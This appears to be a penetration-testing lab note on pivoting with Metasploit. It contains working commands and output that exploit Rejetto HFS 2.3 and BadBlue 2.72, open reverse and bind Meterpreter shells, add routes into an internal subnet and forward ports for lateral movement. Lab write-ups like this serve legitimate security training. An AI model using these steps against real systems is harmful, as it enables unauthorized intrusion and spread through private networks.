Pivoting
Pivoting
Sections in This Note
Pivoting
Pivoting is a post-exploitation technique involving utilizing a compromised host to attack other systems on the compromised host's private internal network. After gaining access to one host, we can use it to exploit other hosts on the same internal network which we previously couldn't access. Meterpreter provides the ability to add a network route to the internal network's subnet, and consequently scan and exploit other systems on the network.
run autoroute -s (IPaddress)
Step 1–2: Nmap scan of the target.
nmap 10.0.23.180
root@attackdefense:~# nmap 10.0.23.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 16:57 IST
Nmap scan report for 10.0.23.180
Host is up (0.057s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds
root@attackdefense:~#
Step 3: We've discovered multiple open ports. Run nmap again to determine version information on port 80.
Command: nmap -sV -p 80 10.0.23.180
root@attackdefense:~# nmap -sV -p 80 10.0.23.180
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-07 16:57 IST
Nmap scan report for 10.0.23.180
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.51 seconds
root@attackdefense:~#
Step 4: Search the exploit module for HFS file server using searchsploit.
Command: searchsploit hfs
Step 5: Rejetto HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploit the target server using Metasploit.
Commands:
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.0.23.180
exploit
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.0.23.180
RHOSTS => 10.0.23.180
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.2:4444
[*] Using URL: http://0.0.0.0:8080/NAT6s85wCG
[*] Local IP: http://10.10.15.2:8080/NAT6s85wCG
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /NAT6s85wCG
[*] Sending stage (175174 bytes) to 10.0.23.180
[*] Meterpreter session 1 opened (10.10.15.2:4444 -> 10.0.23.180:49217) at 2021-04-07 16:59:43 +0530
[!] Tried to delete %TEMP%\GrXXSphPd.vbs, unknown result
[*] Server stopped.
meterpreter >
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : AWS PV Network Device #0
Hardware MAC : 06:b4:67:1a:5e:26
MTU : 9001
IPv4 Address : 10.0.23.180
IPv4 Netmask : 255.255.240.0
IPv6 Address : fe80::297a:1acb:24ac:8cd8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Step 6: Add a route to the internal subnet.
meterpreter > run autoroute -s 10.0.23.0/20
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.23.0/255.255.240.0...
[+] Added route to 10.0.23.0/255.255.240.0 via 10.0.23.180
[*] Use the -p option to list all active routes
meterpreter >
Step 7: Run the port scanner on the second machine.
Commands:
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.27.99
set PORTS 1-100
exploit
Step 8: We've discovered port 80 on the pivot machine. Forward the remote port 80 to local port 1234 and grab the banner using Nmap.
Commands:
sessions -i 1
portfwd add -l 1234 -p 80 -r 10.0.27.99
portfwd list
Step 9: Use Nmap to find the running application name and version (don't close msfconsole).
Command: nmap -sV -sS -p 1234 localhost
Step 10: Search the exploit module for badblue 2.7 using searchsploit.
Command: searchsploit badblue 2.7
Exploit Title
------------------------------------------------------------------------
BadBlue 2.72 - PassThru Remote Buffer Overflow
BadBlue 2.72b - Multiple Vulnerabilities
Working Resources BadBlue - ...
Papers: No Result
root@attackdefense:~#
Step 11: There's a Metasploit module for badblue server. Use the PassThru remote buffer overflow module to exploit the target.
Commands:
use exploit/windows/http/badblue_passthru
set PAYLOAD windows/meterpreter/bind_tcp
set RHOSTS 10.0.27.99
exploit
[*] Trying target BadBlue EE 2.7 Universal...
[*] Started bind TCP handler against 10.0.27.99:4444
[*] Sending stage (175174 bytes) to 10.0.27.99
[*] Meterpreter session opened...
LINUX Exploitation
MSF provides various post-exploitation modules for both Windows and Linux.
Visual Diagram
flowchart LR A[Attacker]-->B[Compromised Host] B-->C[Internal Network] C-->D[Internal Target] B-.route/portfwd.->A